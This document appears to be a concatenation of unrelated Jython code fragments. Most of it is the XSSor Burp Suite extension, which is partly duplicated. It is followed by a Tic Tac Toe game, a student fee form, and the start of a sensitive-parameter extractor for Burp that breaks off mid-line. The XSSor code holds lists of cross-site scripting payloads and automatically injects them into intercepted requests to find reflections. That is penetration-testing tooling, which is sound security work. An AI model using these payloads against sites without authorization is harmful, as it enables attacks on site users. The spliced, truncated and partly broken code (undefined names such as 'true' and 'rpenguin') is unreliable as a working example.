def registerExtenderCallbacks(self, callbacks): # smart xss feature (print conclusion and observation) # mark resulsts # add automatic check pages in the same domain self.tagPayloads = [ "<b>test", "<b onmouseover=test()>test", "<img src=err onerror=test()>", "<script>test</script>" "", "<scr ipt>test</scr ipt>", "<SCRIPT>test;</SCRIPT>", "<scri<script>pt>test;</scr</script>ipt>", "<SCRI<script>PT>test;</SCR</script>IPT>", "<scri<scr<script>ipt>pt>test;</scr</sc</script>ript>ipt>", "<IMG \"\"\"><SCRIPT>test</SCRIPT>\">", "<IMG '''><SCRIPT>test</SCRIPT>'>", "<SCR%00IPT>test</SCR%00IPT>", "<IFRAME SRC='f' onerror=\"test\"></IFRAME>", "<IFRAME SRC='f' onerror='test'></IFRAME>", "<<SCRIPT>test//<</SCRIPT>", "<img src=\"1\" onerror=\"test\">", "<img src='1' onerror='test'", "<STYLE TYPE=\"text/javascript\">test;</STYLE>", "<<SCRIPT>test//<</SCRIPT>" ] self.attributePayloads = [ "\"\"\"><SCRIPT>test", "'''><SCRIPT>test'", "\"><script>test</script>", "\"><script>test</script><\"", "'><script>test</script>", "'><script>test</script><'", "\";test;\"", "';test;'", ";test;", "\";test;//", "\"onmouseover=test ", "onerror=\"test\"", "onerror='test'", "onload=\"test\"", "onload='test'" ] self.xssKey = 'xssme' # keep a reference to our callbacks object self._callbacks = callbacks # obtain an extension helpers object self._helpers = callbacks.getHelpers() # set our extension name callbacks.setExtensionName("XSSor") self.affectedResponses = ArrayList() self._log = ArrayList() self._lock = Lock() # main split pane self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) # table of log entries logTable = Table(self) scrollPane = JScrollPane(logTable) self._splitpane.setLeftComponent(scrollPane) # tabs with request/response viewers tabs = JTabbedPane() self._requestViewer = callbacks.createMessageEditor(self, False) self._responseViewer = callbacks.createMessageEditor(self, False) tabs.addTab("Request", self._requestViewer.getComponent()) tabs.addTab("Response", self._responseViewer.getComponent()) clearAPListBtn = JButton("Clear List", actionPerformed=self.clearAPList) clearAPListBtn.setBounds(10, 85, 120, 30) apListLabel = JLabel('Affected Pages List:') apListLabel.setBounds(10, 10, 140, 30) self.affectedModel = DefaultListModel() self.affectedList = JList(self.affectedModel) self.affectedList.addListSelectionListener(listSelectedChange(self)) scrollAList = JScrollPane(self.affectedList) scrollAList.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollAList.setBounds(150, 10, 550, 200) scrollAList.setBorder(LineBorder(Color.BLACK)) APtabs = JTabbedPane() self._requestAPViewer = callbacks.createMessageEditor(self, False) self._responseAPViewer = callbacks.createMessageEditor(self, False) APtabs.addTab("Request", self._requestAPViewer.getComponent()) APtabs.addTab("Affeced Page Response", self._responseAPViewer.getComponent()) APtabs.setBounds(0, 250, 700, 350) APtabs.setSelectedIndex(1) self.APpnl = JPanel() self.APpnl.setBounds(0, 0, 1000, 1000) self.APpnl.setLayout(None) self.APpnl.add(scrollAList) self.APpnl.add(clearAPListBtn) self.APpnl.add(APtabs) self.APpnl.add(apListLabel) tabs.addTab("Affected Pages", self.APpnl) self.intercept = 0 ## init conf panel startLabel = JLabel("Plugin status:") startLabel.setBounds(10, 10, 140, 30) payloadLabel = JLabel("Basic Payload:") payloadLabel.setBounds(10, 50, 140, 30) self.basicPayload = "<script>alert(1)</script>" self.basicPayloadTxt = JTextArea(self.basicPayload, 5, 30) self.basicPayloadTxt.setBounds(120, 50, 305, 30) self.bruteForceMode = JCheckBox("Brute Force Mode") self.bruteForceMode.setBounds(120, 80, 300, 30) self.bruteForceMode.addItemListener(handleBFModeChange(self)) self.tagPayloadsCheck = JCheckBox("Tag paylods") self.tagPayloadsCheck.setBounds(120, 100, 300, 30) self.tagPayloadsCheck.setSelected(True) self.tagPayloadsCheck.setEnabled(False) self.tagPayloadsCheck.addItemListener(handleBFModeList(self)) self.attributePayloadsCheck = JCheckBox("Attribute payloads") self.attributePayloadsCheck.setBounds(260, 100, 300, 30) self.attributePayloadsCheck.setSelected(True) self.attributePayloadsCheck.setEnabled(False) self.attributePayloadsCheck.addItemListener(handleBFModeList(self)) payloadListLabel = JLabel("Payloads list (for BF mode):") payloadListLabel.setBounds(10, 130, 140, 30) self.payloadsModel = DefaultListModel() self.payloadsList = JList(self.payloadsModel) scrollPayloadsList = JScrollPane(self.payloadsList) scrollPayloadsList.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollPayloadsList.setBounds(120, 170, 300, 200) scrollPayloadsList.setBorder(LineBorder( Color.BLACK)) # add buttons to remove payloads and add for payload in self.tagPayloads: self.payloadsModel.addElement(payload) for payload in self.attributePayloads: self.payloadsModel.addElement(payload) self.startButton = JButton("XSSor is off", actionPerformed=self.startOrStop) self.startButton.setBounds(120, 10, 120, 30) self.startButton.setBackground(Color(255, 100, 91, 255)) consoleTab = JTabbedPane() self.consoleLog = JTextArea("", 5, 30) scrollLog = JScrollPane(self.consoleLog) scrollLog.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollLog.setBounds(120, 170, 550, 200) scrollLog.setBorder(LineBorder(Color.BLACK)) scrollLog.getVerticalScrollBar().addAdjustmentListener( autoScrollListener(self)) consoleTab.addTab("Console", scrollLog) consoleTab.setBounds(0, 400, 500, 200) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000) self.pnl.setLayout(None) self.pnl.add(self.startButton) self.pnl.add(startLabel) self.pnl.add(payloadLabel) self.pnl.add(self.basicPayloadTxt) self.pnl.add(self.bruteForceMode) self.pnl.add(payloadListLabel) self.pnl.add(scrollPayloadsList) self.pnl.add(self.attributePayloadsCheck) self.pnl.add(self.tagPayloadsCheck) self.pnl.add(consoleTab) tabs.addTab("Configuration", self.pnl) tabs.setSelectedIndex(3) self._splitpane.setRightComponent(tabs) # customize our UI components callbacks.customizeUiComponent(self._splitpane) callbacks.customizeUiComponent(logTable) callbacks.customizeUiComponent(scrollPane) callbacks.customizeUiComponent(tabs) # add the custom tab to Burp's UI callbacks.addSuiteTab(self) # register ourselves as an HTTP listener callbacks.registerHttpListener(self) self._callbacks.registerContextMenuFactory(self) print "Thank you for installing XSSor v0.1 extension" print "Created by Barak Tawily" print "\nGithub:\nhttps://github.com/Quitten/XSSor" return
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory): def registerExtenderCallbacks(self, callbacks): # smart xss feature (print conclusion and observation) # mark resulsts # add automatic check pages in the same domain self.tagPayloads = [ "<b>test", "<b onmouseover=test()>test", "<img src=err onerror=test()>", "<script>test</script>" "", "<scr ipt>test</scr ipt>", "<SCRIPT>test;</SCRIPT>", "<scri<script>pt>test;</scr</script>ipt>", "<SCRI<script>PT>test;</SCR</script>IPT>", "<scri<scr<script>ipt>pt>test;</scr</sc</script>ript>ipt>", "<IMG \"\"\"><SCRIPT>test</SCRIPT>\">", "<IMG '''><SCRIPT>test</SCRIPT>'>", "<SCR%00IPT>test</SCR%00IPT>", "<IFRAME SRC='f' onerror=\"test\"></IFRAME>", "<IFRAME SRC='f' onerror='test'></IFRAME>", "<<SCRIPT>test//<</SCRIPT>", "<img src=\"1\" onerror=\"test\">", "<img src='1' onerror='test'", "<STYLE TYPE=\"text/javascript\">test;</STYLE>", "<<SCRIPT>test//<</SCRIPT>" ] self.attributePayloads = [ "\"\"\"><SCRIPT>test", "'''><SCRIPT>test'", "\"><script>test</script>", "\"><script>test</script><\"", "'><script>test</script>", "'><script>test</script><'", "\";test;\"", "';test;'", ";test;", "\";test;//", "\"onmouseover=test ", "onerror=\"test\"", "onerror='test'", "onload=\"test\"", "onload='test'" ] self.xssKey = 'xssme' # keep a reference to our callbacks object self._callbacks = callbacks # obtain an extension helpers object self._helpers = callbacks.getHelpers() # set our extension name callbacks.setExtensionName("XSSor") self.affectedResponses = ArrayList() self._log = ArrayList() self._lock = Lock() # main split pane self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) # table of log entries logTable = Table(self) scrollPane = JScrollPane(logTable) self._splitpane.setLeftComponent(scrollPane) # tabs with request/response viewers tabs = JTabbedPane() self._requestViewer = callbacks.createMessageEditor(self, False) self._responseViewer = callbacks.createMessageEditor(self, False) tabs.addTab("Request", self._requestViewer.getComponent()) tabs.addTab("Response", self._responseViewer.getComponent()) clearAPListBtn = JButton("Clear List", actionPerformed=self.clearAPList) clearAPListBtn.setBounds(10, 85, 120, 30) apListLabel = JLabel('Affected Pages List:') apListLabel.setBounds(10, 10, 140, 30) self.affectedModel = DefaultListModel() self.affectedList = JList(self.affectedModel) self.affectedList.addListSelectionListener(listSelectedChange(self)) scrollAList = JScrollPane(self.affectedList) scrollAList.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollAList.setBounds(150, 10, 550, 200) scrollAList.setBorder(LineBorder(Color.BLACK)) APtabs = JTabbedPane() self._requestAPViewer = callbacks.createMessageEditor(self, False) self._responseAPViewer = callbacks.createMessageEditor(self, False) APtabs.addTab("Request", self._requestAPViewer.getComponent()) APtabs.addTab("Affeced Page Response", self._responseAPViewer.getComponent()) APtabs.setBounds(0, 250, 700, 350) APtabs.setSelectedIndex(1) self.APpnl = JPanel() self.APpnl.setBounds(0, 0, 1000, 1000) self.APpnl.setLayout(None) self.APpnl.add(scrollAList) self.APpnl.add(clearAPListBtn) self.APpnl.add(APtabs) self.APpnl.add(apListLabel) tabs.addTab("Affected Pages", self.APpnl) self.intercept = 0 ## init conf panel startLabel = JLabel("Plugin status:") startLabel.setBounds(10, 10, 140, 30) payloadLabel = JLabel("Basic Payload:") payloadLabel.setBounds(10, 50, 140, 30) self.basicPayload = "<script>alert(1)</script>" self.basicPayloadTxt = JTextArea(self.basicPayload, 5, 30) self.basicPayloadTxt.setBounds(120, 50, 305, 30) self.bruteForceMode = JCheckBox("Brute Force Mode") self.bruteForceMode.setBounds(120, 80, 300, 30) self.bruteForceMode.addItemListener(handleBFModeChange(self)) self.tagPayloadsCheck = JCheckBox("Tag paylods") self.tagPayloadsCheck.setBounds(120, 100, 300, 30) self.tagPayloadsCheck.setSelected(True) self.tagPayloadsCheck.setEnabled(False) self.tagPayloadsCheck.addItemListener(handleBFModeList(self)) self.attributePayloadsCheck = JCheckBox("Attribute payloads") self.attributePayloadsCheck.setBounds(260, 100, 300, 30) self.attributePayloadsCheck.setSelected(True) self.attributePayloadsCheck.setEnabled(False) self.attributePayloadsCheck.addItemListener(handleBFModeList(self)) payloadListLabel = JLabel("Payloads list (for BF mode):") payloadListLabel.setBounds(10, 130, 140, 30) self.payloadsModel = DefaultListModel() self.payloadsList = JList(self.payloadsModel) scrollPayloadsList = JScrollPane(self.payloadsList) scrollPayloadsList.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollPayloadsList.setBounds(120, 170, 300, 200) scrollPayloadsList.setBorder(LineBorder( Color.BLACK)) # add buttons to remove payloads and add for payload in self.tagPayloads: self.payloadsModel.addElement(payload) for payload in self.attributePayloads: self.payloadsModel.addElement(payload) self.startButton = JButton("XSSor is off", actionPerformed=self.startOrStop) self.startButton.setBounds(120, 10, 120, 30) self.startButton.setBackground(Color(255, 100, 91, 255)) consoleTab = JTabbedPane() self.consoleLog = JTextArea("", 5, 30) scrollLog = JScrollPane(self.consoleLog) scrollLog.setVerticalScrollBarPolicy( JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED) scrollLog.setBounds(120, 170, 550, 200) scrollLog.setBorder(LineBorder(Color.BLACK)) scrollLog.getVerticalScrollBar().addAdjustmentListener( autoScrollListener(self)) consoleTab.addTab("Console", scrollLog) consoleTab.setBounds(0, 400, 500, 200) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000) self.pnl.setLayout(None) self.pnl.add(self.startButton) self.pnl.add(startLabel) self.pnl.add(payloadLabel) self.pnl.add(self.basicPayloadTxt) self.pnl.add(self.bruteForceMode) self.pnl.add(payloadListLabel) self.pnl.add(scrollPayloadsList) self.pnl.add(self.attributePayloadsCheck) self.pnl.add(self.tagPayloadsCheck) self.pnl.add(consoleTab) tabs.addTab("Configuration", self.pnl) tabs.setSelectedIndex(3) self._splitpane.setRightComponent(tabs) # customize our UI components callbacks.customizeUiComponent(self._splitpane) callbacks.customizeUiComponent(logTable) callbacks.customizeUiComponent(scrollPane) callbacks.customizeUiComponent(tabs) # add the custom tab to Burp's UI callbacks.addSuiteTab(self) # register ourselves as an HTTP listener callbacks.registerHttpListener(self) self._callbacks.registerContextMenuFactory(self) print "Thank you for installing XSSor v0.1 extension" print "Created by Barak Tawily" print "\nGithub:\nhttps://github.com/Quitten/XSSor" return # # implement ITab # def getTabCaption(self): return "XSSor" def getUiComponent(self): return self._splitpane # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): if self.intercept == 1: if toolFlag == 4: # only process requests if not messageIsRequest: self.checkForKey(messageInfo) return def printLog(self, message): self.consoleLog.setText(self.consoleLog.getText() + '\r\n' + message) def checkXSS(self, messageInfo, urlStr, requestBody, currentPayload): self.printLog('trying exploit with the payload: ' + currentPayload) requestURL = URL(urlStr.replace(self.xssKey, currentPayload)) requestBody = requestBody.replace(self.xssKey, urllib.pathname2url(currentPayload)) httpService = self._helpers.buildHttpService( str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https") response = self._callbacks.makeHttpRequest(httpService, requestBody) responseInfo = self._helpers.analyzeResponse(response.getResponse()) analyzedResponse = self._helpers.bytesToString(response.getResponse( )) # change body offeset + make ui for affeccted pages responseBody = analyzedResponse.encode('utf-8') vulnOrNot = 'no' if currentPayload in responseBody: self.printLog('payload: ' + currentPayload + ' found to be vulnarble') vulnOrNot = 'yes' # mark the payload if not len(self.affectedResponses) == 0: for request in self.affectedResponses: # bug in case of no response in messageinfo self.printLog('checking affeccted page' + str(request.getUrl())) requestURL = request.getUrl() httpService = self._helpers.buildHttpService( str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https") affectedPageResponse = self._callbacks.makeHttpRequest( httpService, request.getRequest()) analyzedResponse = self._helpers.bytesToString( affectedPageResponse.getResponse()) responseBody = analyzedResponse.encode('utf-8') if currentPayload in responseBody: vulnOrNot = 'yes, affected page' self.printLog('affeccted page has been found as vulnerable') self._lock.acquire() row = self._log.size() self._log.add( LogEntry( self._helpers.analyzeRequest(response).getUrl(), self._callbacks.saveBuffersToTempFiles(response), currentPayload, vulnOrNot)) self.fireTableRowsInserted(row, row) self._lock.release() def checkForKey(self, messageInfo): currentPayload = self.tagPayloads[0] requestInfo = self._helpers.analyzeRequest(messageInfo) requestHeaders = list(requestInfo.getHeaders()) requestURL = requestInfo.getUrl() urlStr = str(requestURL) self.printLog('checking for xss key in URL: ' + urlStr) requestBody = self._helpers.bytesToString(messageInfo.getRequest()) requestBody = re.sub( 'Referer:.*\n', '', requestBody, flags=re.MULTILINE, count=1) # workaround avoid xsskey in the referer newHeaders if self.xssKey in urlStr or self.xssKey in requestBody: self.printLog('xss key has been found') if self.bruteForceMode.isSelected(): for i in range(0, self.payloadsModel.getSize()): payload = self.payloadsModel.getElementAt(i) self.checkXSS(messageInfo, urlStr, requestBody, payload) else: self.checkXSS(messageInfo, urlStr, requestBody, self.basicPayloadTxt.getText()) # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 3 def getColumnName(self, columnIndex): if columnIndex == 0: return "URL" if columnIndex == 1: return "Payload" if columnIndex == 2: return "Vulnerable?" return "" def getValueAt(self, rowIndex, columnIndex): logEntry = self._log.get(rowIndex) if columnIndex == 0: # return self._callbacks.getToolName(logEntry._tool) return logEntry._url.toString() if columnIndex == 1: return logEntry._payload if columnIndex == 2: return logEntry._vulnOrNot return "" # # implement IMessageEditorController # this allows our request/response viewers to obtain details about the messages being displayed # def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() def startOrStop(self, event): if self.startButton.getText() == "XSSor is off": self.startButton.setText("XSSor is on") self.startButton.setBackground(Color.GREEN) self.printLog('on, waiting for key word to be found (' + self.xssKey + ')') self.intercept = 1 else: self.startButton.setText("XSSor is off") self.startButton.setBackground(Color(255, 100, 91, 255)) self.intercept = 0 def clearAPList(self, event): self.affectedModel.clear() self.affectedResponses = ArrayList() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages() if responses > 0: ret = LinkedList() affectedMenuItem = JMenuItem("XSSor: Add affected page") affectedMenuItem.addActionListener( handleMenuItems(self, responses[0], "affected")) ret.add(affectedMenuItem) return (ret) return null def addAfectedPage(self, messageInfo): self.affectedModel.addElement( str(self._helpers.analyzeRequest(messageInfo).getUrl())) self.affectedResponses.add(messageInfo)
class TicTacToeGame(WindowAdapter): # Tic Tac Toe game with Mario and Dizzy animated icons/music. # Computer plays with Mario and player plays with Dizzy. # game title game_title = "Tic Tac Toe: You vs Mario" # welcome status message. welcome_status = "Welcome! Please make your first move." # in-game status message. in_game_status = "Mario chases You! Hurry up!" # board 3x3 with the default color - white board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']] # total number of cells size = len(board) * len(board) # size of cell tile_size = 128 # status bar height status_bar_height = 50 # status bar top margin status_bar_margin_top = -15 # status bar left margin status_bar_margin_left = 10 # number of cells in a row/column cells = 3 # winner winner = None # Mario image mario = '/MARIO_128x128.gif' # Dizzy image dizzy = None # Blank blank = '/BLANK.gif' # supported musice sounds sounds = ['/DIZZY.wav', '/MARIO.wav'] # currently played sound sound = None # last chosen sound last_sound = 0 # won sound won_sound = '/WON.wav' # lose sound lose_sound = '/LOSE.wav' # tie sound tie_sound = '/TIE.wav' # action sound action_sound = '/ACTION.wav' def __init__(self, resources_directory): # Game constructor. # # Parameters: # resources_directory Directory to look for images and audio files. is_windows = platform.platform().lower().find('win') > 0 self.main_window_padding_right = 20 if is_windows else 0 self.main_window_padding_bottom = 40 if is_windows else 0 self.resources_directory = resources_directory self.button1 = JButton("", actionPerformed=self.clicked1) self.button2 = JButton("", actionPerformed=self.clicked2) self.button3 = JButton("", actionPerformed=self.clicked3) self.button4 = JButton("", actionPerformed=self.clicked4) self.button5 = JButton("", actionPerformed=self.clicked5) self.button6 = JButton("", actionPerformed=self.clicked6) self.button7 = JButton("", actionPerformed=self.clicked7) self.button8 = JButton("", actionPerformed=self.clicked8) self.button9 = JButton("", actionPerformed=self.clicked9) image_size = self.tile_size self.button1.setBounds(0 * image_size, 0 * image_size, image_size, image_size) self.button2.setBounds(1 * image_size, 0 * image_size, image_size, image_size) self.button3.setBounds(2 * image_size, 0 * image_size, image_size, image_size) self.button4.setBounds(0 * image_size, 1 * image_size, image_size, image_size) self.button5.setBounds(1 * image_size, 1 * image_size, image_size, image_size) self.button6.setBounds(2 * image_size, 1 * image_size, image_size, image_size) self.button7.setBounds(0 * image_size, 2 * image_size, image_size, image_size) self.button8.setBounds(1 * image_size, 2 * image_size, image_size, image_size) self.button9.setBounds(2 * image_size, 2 * image_size, image_size, image_size) self.buttons = [ self.button1, self.button2, self.button3, self.button4, self.button5, self.button6, self.button7, self.button8, self.button9 ] self.buttons_mapped = [[self.button1, self.button2, self.button3], [self.button4, self.button5, self.button6], [self.button7, self.button8, self.button9]] width = self.tile_size * self.cells height = width self.frame = JFrame(self.game_title, size=(width, height + self.status_bar_height)) self.frame.setLocation(200, 100) self.frame.setLayout(None) for button in self.buttons: self.frame.add(button) self.status_label = JLabel("") self.status_label.setBounds(self.status_bar_margin_left, height + self.status_bar_margin_top, width, self.status_bar_height) self.frame.add(self.status_label) self.frame.setVisible(True) self.frame.addWindowListener(self) random.shuffle(self.sounds) self.restart() # Restarts the game. def restart(self): self.dizzy = None self.dizzy = self.choosePlayer() self.winner = None self.board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']] for button in self.buttons: button.setIcon(ImageIcon(self.resources_directory + self.blank)) self.stop_playing_background() self.sound = self.play_sound_safe(self.sounds[self.last_sound]) self.last_sound = self.last_sound + 1 if self.last_sound >= len(self.sounds): self.last_sound = 0 self.status_label.setText(self.welcome_status) # Stops playing any background music, if any playing now. def stop_playing_background(self): if self.sound != None: self.sound.stopPlaying() self.sound = None def set_dizzy(self, button): # Draws Dizzy in a given button, sets game status to "Playing" and # plays action sound. # # Parameters: # button to set Dizzy icon to. button.setIcon(ImageIcon(self.resources_directory + self.dizzy)) self.status_label.setText(self.in_game_status) self.play_sound_safe(self.action_sound) def set_mario(self, button): # Draws Mario in a given button. # # Parameters: # button to set Mario icon to. button.setIcon(ImageIcon(self.resources_directory + self.mario)) def clicked1(self, event): # Event listener method for the button of the game at 0x0. # # Parameters: # event Click event. if self.board[0][0] != ' ': return self.board[0][0] = 'X' self.set_dizzy(self.button1) self.computer_move() def clicked2(self, event): # Event listener method for the button of the game at 0x1. # # Parameters: # event Click event. if self.board[0][1] != ' ': return self.board[0][1] = 'X' self.set_dizzy(self.button2) self.computer_move() def clicked3(self, event): # Event listener method for the button of the game at 0x2. # # Parameters: # event Click event. if self.board[0][2] != ' ': return self.board[0][2] = 'X' self.set_dizzy(self.button3) self.computer_move() def clicked4(self, event): # Event listener method for the button of the game at 1x0. # # Parameters: # event Click event. if self.board[1][0] != ' ': return self.board[1][0] = 'X' self.set_dizzy(self.button4) self.computer_move() def clicked5(self, event): # Event listener method for the button of the game at 1x1. # # Parameters: # event Click event. if self.board[1][1] != ' ': return self.board[1][1] = 'X' self.set_dizzy(self.button5) self.computer_move() def clicked6(self, event): # Event listener method for the button of the game at 1x2. # # Parameters: # event Click event. if self.board[1][2] != ' ': return self.board[1][2] = 'X' self.set_dizzy(self.button6) self.computer_move() def clicked7(self, event): # Event listener method for the button of the game at 2x0. # # Parameters: # event Click event. if self.board[2][0] != ' ': return self.board[2][0] = 'X' self.set_dizzy(self.button7) self.computer_move() def clicked8(self, event): # Event listener method for the button of the game at 2x1. # Parameters: # event Click event. if self.board[2][1] != ' ': return self.board[2][1] = 'X' self.set_dizzy(self.button8) self.computer_move() def clicked9(self, event): # Event listener method for the button of the game at 2x2. # # Parameters: # event Click event. if self.board[2][2] != ' ': return self.board[2][2] = 'X' self.set_dizzy(self.button9) self.computer_move() # Makes the next move on the board on behalf of the computer. def computer_move(self): # first move optimization - always start in the middle if possible if self.board[1][1] == ' ': self.board[1][1] = '0' self.set_mario(self.buttons_mapped[1][1]) self.test_state() return while self.has_empty_cell(): y = random.randint(0, self.cells - 1) x = random.randint(0, self.cells - 1) if self.board[y][x] == ' ': self.board[y][x] = '0' self.set_mario(self.buttons_mapped[y][x]) break self.test_state() def test_state(self): # Tests the board for a winning state. # If there is a winner then stops currently playing # background sound, creates winning label, plays result # sound and notifies/asks the user about continuation. if self.is_any_line_filled('X'): self.winner = self.dizzy # dizzy elif self.is_any_line_filled('0'): self.winner = self.mario # mario elif not self.has_empty_cell(): self.winner = self.blank # tie if self.winner: label = 'Tie.' self.stop_playing_background() if self.winner == self.mario: label = 'You lose!' self.play_sound_safe(self.lose_sound) elif self.winner == self.dizzy: label = 'You won!' self.play_sound_safe(self.won_sound) else: self.play_sound_safe(self.tie_sound) self.notify_and_ask_about_continuation(label) def notify_and_ask_about_continuation(self, label): # Shows modal window with the result of the game and asks the use whether they want to # continue the game. # If user answers "Y" or "y" restarts the game. # If user answers "N" or "n" closes the game window and frees the resources. # Parameters: # label Game result label. answer = None self.status_label.setText(label) while True: answer = str( requestString(label + "\r\n" + "Do you want to play again? (Y/N)")) if answer.lower() == "y": self.restart() break elif answer.lower() == "n": self.windowClosing(None) break def is_any_line_filled(self, character): # Checks the winning condition for the given character 'X' or '0'. # # Returns: # Whether the given character 'X' or '0' has a winning line filled. is_row = self.is_row_filled(character) is_col = self.is_col_filled(character) is_d1 = self.is_diag_filled1(character) is_d2 = self.is_diag_filled2(character) return is_row or is_col or is_d1 or is_d2 def has_empty_cell(self): #Checks if the game board contains an empty cell for the next move. # #Returns: # Whether there is an empty cell on the board. for row in range(len(self.board)): for col in range(len(self.board)): if self.board[row][col] == ' ': return True return False def is_row_filled(self, color): # Check row win condition. # # Parameters: # color (string) - color to check if the whole row of the same color # Returns: # True (boolean) - if the whole row of the same color # False (boolean) - if the row is not of the same color for row in range(len(self.board)): count = 0 for col in range(len(self.board)): if self.board[row][col] == color: count = count + 1 if count == self.cells: return True return False def is_col_filled(self, color): #Check column win condition. # # Parameters: # color (string) - color to check if the whole column of the same color # Returns: # True (boolean) - if the whole column of the same color # False (boolean) - if the column is not of the same color for col in range(len(self.board)): count = 0 for row in range(len(self.board)): if self.board[row][col] == color: count = count + 1 if count == self.cells: return True return False def is_diag_filled1(self, color): # Checks first diagonal win condition. # # Parameters: # color (string) - color to check if the whole diagonal of the same color # Returns: # True (boolean) - if the whole diagonal of the same color # False (boolean) - if the diagonal is not of the same color count = 0 for idx in range(len(self.board)): if self.board[idx][idx] == color: count = count + 1 return count == self.cells def is_diag_filled2(self, color): # Checks second diagonal win condition. # # Parameters: # color (string) - color to check if the whole diagonal of the same color # Returns: # True (boolean) - if the whole diagonal of the same color # False (boolean) - if the diagonal is not of the same color count = 0 for idx in range(len(self.board)): if self.board[idx][self.cells - 1 - idx] == color: count = count + 1 return count == self.cells def play_sound_safe(self, sound): # Method tries to play given sound catching possible exceptions. # For example, if the sound wasn't found in resource directory # # Parameters: # sound string with a file of a sound with leading slash '/'. # Returns: # Created Sound object fromo makeSound. snd = None try: snd = makeSound(self.resources_directory + sound) play(snd) except: showError("Error while playing sound " + str(sound) + ".") return snd def windowClosing(self, event): # Method is invoked when a user closes game window or finishes playing. # It is the implementation of WindowAdapter interface. # # Parameters: final event from Swing/AWT self.stop_playing_background() self.buttons = [] self.buttons_mapped = [] self.button1 = None self.button2 = None self.button3 = None self.button4 = None self.button5 = None self.button6 = None self.button7 = None self.button8 = None self.button9 = None self.status_label = None self.frame.getContentPane().removeAll() self.frame.dispose() self.frame = None def choosePlayer(self): while true: select = requestString( "You are against Mario. Choose Your Character: penguin chrome fox fish bird charizard sonic " ) selection = select.lower() if selection == "penguin": return rpenguin break if selection == "chrome": return rchrome break if selection == "fox": return rfox break if selection == "fish": return rfish break if selection == "bird": return rbird break if selection == "charizard": return rcharizard break if selection == "sonic": return rsonic break
def createStudentFeeForm(stFeeObj): global tfStudentId global tfStudentName global tfTotalAmount global tfPaidAmount global tfRemainingAmount global frame frame = JFrame("Student Fee Form ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500,500) frame.setLocation(200,200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500,500) panel.setLocation(0,0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.LIGHT_GRAY) heading = JLabel("STUDENT FEE") heading.setBounds(200,30,150,40) lbStudentId = JLabel(" Student id") lbStudentName = JLabel(" student name") lbTotalAmount = JLabel("Total Amount ") lbPaidAmount = JLabel("Paid Amount") lbRemainingAmount = JLabel("Remaining amount") studentId =getattr(stFeeObj,'studentId') studentName =getattr(stFeeObj,'studentName') totalAmount =getattr(stFeeObj,'totalAmount') paidAmount =getattr(stFeeObj,'paidAmount') remainingAmount =getattr(stFeeObj,'remainingAmount') tfStudentId = JTextField(str(studentId)) tfStudentName = JTextField(str(studentName)) tfTotalAmount = JTextField(str(totalAmount)) tfPaidAmount = JTextField(str(paidAmount)) tfRemainingAmount = JTextField(str(remainingAmount)) tfStudentId.setEditable(False) tfStudentName.setEditable(False) tfTotalAmount.setEditable(False) tfRemainingAmount.setEditable(False) lbStudentId.setBounds(70,100,130,30) lbStudentName.setBounds(70,150,130,30) lbTotalAmount.setBounds(70,200,130,30) lbPaidAmount.setBounds(70,250,130,30) lbRemainingAmount.setBounds(70,300,130,30) tfStudentId.setBounds(220,100,130,30) tfStudentName.setBounds(220,150,130,30) tfTotalAmount.setBounds(220,200,130,30) tfPaidAmount.setBounds(220,250,130,30) tfRemainingAmount.setBounds(220,300,130,30) btnPay = JButton("Paid",actionPerformed=clickPay) btnPay.setBounds(350,410,100,40) btnCancel = JButton("Cancel",actionPerformed=clickbtnCancelForm) btnCancel.setBounds(50,410,100,40) panel.add(heading) panel.add(lbStudentId) panel.add(lbStudentName) panel.add(lbTotalAmount) panel.add(lbPaidAmount) panel.add(lbRemainingAmount) panel.add(tfStudentId) panel.add(tfStudentName) panel.add(tfTotalAmount) panel.add(tfPaidAmount) panel.add(tfRemainingAmount) panel.add(btnPay) panel.add(btnCancel) frame.add(panel)
class BurpExtender(IBurpExtender, ITab, IHttpListener): def registerExtenderCallbacks(self, callbacks): self._callbacks = callbacks self._helpers = callbacks.getHelpers() callbacks.setExtensionName("burp-sensitive-param-extractor") self._stdout = PrintWriter(callbacks.getStdout(), True) callbacks.registerHttpListener(self) #callbacks.registerMessageEditorTabFactory(self) print 'burp-sensitive-param-extractor loaded.\nAuthor:LSA\nhttps://github.com/theLSA/burp-sensitive-param-extractor' self.sensitiveParamR = getParamRegular() self._callbacks.customizeUiComponent(self.getUiComponent()) self._callbacks.addSuiteTab(self) #self.endColors = [] self.requestParamDict = {} self.resultSensitiveParamsDict = {} def getTabCaption(self): return 'BSPE' def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): if messageIsRequest and toolFlag == 4: self.requestParamDict['urlParams'] = [] self.requestParamDict['BodyParams'] = [] self.requestParamDict['cookieParams'] = [] self.requestParamDict['jsonParams'] = [] cookieParamFlag = 0 service = messageInfo.getHttpService() request = messageInfo.getRequest() analyzeReq = self._helpers.analyzeRequest(service, request) reqUrl = 